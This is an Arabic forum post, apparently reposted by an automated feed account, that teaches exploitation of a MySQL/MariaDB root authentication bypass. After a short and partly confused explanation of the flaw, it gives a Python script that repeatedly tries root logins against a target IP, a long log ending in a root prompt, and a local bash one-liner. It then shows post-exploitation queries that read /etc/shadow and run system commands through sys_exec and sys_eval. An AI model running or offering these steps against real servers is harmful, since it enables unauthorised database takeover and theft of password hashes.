الوسوم:
حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    [​IMG]


    اليوم سنرى تغرة خطيرة في نضم إدارة قواعد البيانات من نوع mysql و MariaDB تسمح

    بتجاوز كلمه السر لحساب الرووت root باستخدام كلمه دخول خاطئه


    إصدارات مصابة 5.1.61, 5.2.11, 5.3.5, 5.5.2


    كلمة مقتبسة من SinaRitx عن تغرة

    كود PHP:
    الفكره هنا تعتمد على طريقه معالجه البرامج المصابه لكلمات المرور الخاصه بالمستخدمين فيها حيث فى كل مره يتم تسجيل الدخول بكلمه مرور يتم فتح token جديد ومن ثم مقارنته بكلمه المرور المتوقعه والمحفوظه بداخل القاعده وذلك عن طريق استخدام داله memcpy() والتى تفترض انه يتم ارجاع القيم فقط فى حدود -127 الى 127 الى انه فى بعض نظم التشغيل وباستخدام بعض الكومايلرز تكون الداله memcpy() ذات مدى اكبر من -127 الى 127 ومن ثم تقوم بارجاع قيم اكثر .

    بمعنى اخر انه عندما يتم تسجيل الدخول يتم استنتاج هاش محدد لكلمه المرور الموضوعه فى الحقل ومن ثم يتم مقارنتها بالهاش المحفوظ فى قاعده البيانات واذا لم يكونا متطابقين يتم رفض عمليه تسجيل الدخول , اذا لابد من فهم كيفيه استنتاج الهاش بصوره مبسطه

    ولنفترض ان كلمه السر لمدير السرفر صاحب حساب ال root هى 0011223344
    وانها محفوظه فى بيانات مدير السرفر بتشفير محدد وليكن
    "2fc5ce2c16c697a9362aeade602ab166"

    من بعدها ياتى المخترق وعندما يحاول تسجيل الدخول باستخدام اى كلمه سر اخرى يكون الناتج هو هاش مختلف فى حاله واحده فقط اذا كانت كلتا الكلمتان تحت نفس ظروف التشفير بمعنى اصح تحت نفس المستوى ونفس معادله التشفير من نفس النوع ونفس المتغيرات سينتج ببساطه هاش مختلف وبناء عليه يتم رفض كلمه السر

    ماذا لو كانت العمليه تتم فى قواعد بيانات ال MySQL بطريقه مختلفه ؟؟؟؟
    عند دراسه طرق تشفير كلمه المرور الخاصه بحساب ال root فى قواعد ال MySQL وجد انها تسمح تقوم بتخزين الهاش الخاص بكلمه المرور ومن ثم تقوم بمقارنه كلمه المرور المستخدمه فى كل مره يتم فيها تسجيل الدخول الا انها لا تضع نفس ظروف التشفير فى كل الحالات بمعنى اصح يتم استخدام معادله تشفير واحده ولاكن بمتغيرات مختلفه فى كل مره وذلك يفتح الباب امام العديد من الاحتمالات فى تطابق كلمه السر وعند حسابها رياضيا وجد ان احتمال تطابق الهاش الناتج مع الهاش المخزن فى بيانات الادمن تساوى 1
    /256 وذلك عند التخمين باستخدام حساب واحد فقط وهو ال root


    بعدما شرحنا تغرة وعرفنا مبدأ حدوتها الأن نأتي للإستغلال
    1-remote exploit
    لإستغلالها نعتمد علىm e t a sploit كما ترون في صورة اتية

    [​IMG]

    أو عن طريق سكريبت python

    كود PHP:
    #!/usr/bin/python
    #
    #
    # This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
    #
    # Title: MySQL Remote Root Authentication Bypass
    # Written by: Dave Kennedy (ReL1K)
    # Secmaniac has moved!
    #
    # Original advisory here: seclists.org/oss-sec/2012/q2/493
    import subprocess

    ipaddr
    = raw_input("Enter the IP address of the mysql server: ")

    while
    1:
    subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()


    رابط تغرة

    بعد تنفيد كما ترون تم دخول إلى قاعدة البيانات بحساب root
    كود PHP:
    relik@stronghold:~# python mysql_bypass.py
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'
    localhost’ (using password: YES)
    ERROR 1045 (28000): Access denied for user ‘root’@'localhost’ (using password: YES)
    Reading table information for completion of table and column names
    You can turn off this feature to get a quicker startup with -A

    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 24598
    Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

    Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates. Other names may be trademarks of their respective
    owners.

    Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

    mysql>


    2-local exploit

    لإستغلالها نقوم بتنفيد هدا الأمر
    كود PHP:
    for i in `seq 1 512`; do echo 'select @@version;' | mysql -h 127.0.0.1 -u root mysql --password=X 2>/dev/null && break; done


    بعدها ستجد نفسك بداخل database with root user هكدا
    كود PHP:
    Welcome to the MySQL monitor. Commands end with ; or \g.
    Your MySQL connection id is 24598
    Server version
    : 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

    Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

    Oracle is a registered trademark of Oracle Corporation and/or its
    affiliates
    . Other names may be trademarks of their respective
    owners
    .

    Type ‘help;or \h’ for help. Type ‘\c’ to clear the current input statement.

    mysql>


    وهاهو فيديو يشرح عملية
    http://www.youtube.com/watch?v=B_3Bp...eature=related

    سؤال الدي سيطرحه البعض مادا بعد دخول ?

    يا أخي بعد دخول يمكنك قراءة الملفات كا shadow متلاً
    كود PHP:
    select load_file('/etc/shadow');


    أو تطبيق أوامر عن طريق sys_exec أو sys_eval متلاً
    كود PHP:
    select sys_exec("cat /etc/passwd");


    كود PHP:
    mysql> SELECT sys_eval('id');
    +--------------------------------------------------+
    |
    sys_eval('id') |
    +--------------------------------------------------+
    |
    Linux localhost.localdomain 2.6.32-220.2.1.el6.x86_64 #1 SMP Fri Dec 23 02:21:33 CST 2011 x86_64 |
    +--------------------------------------------------+
    1 row in set (0.02 sec)


    اتمنى الدرس يكون مفهوم
    s1
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة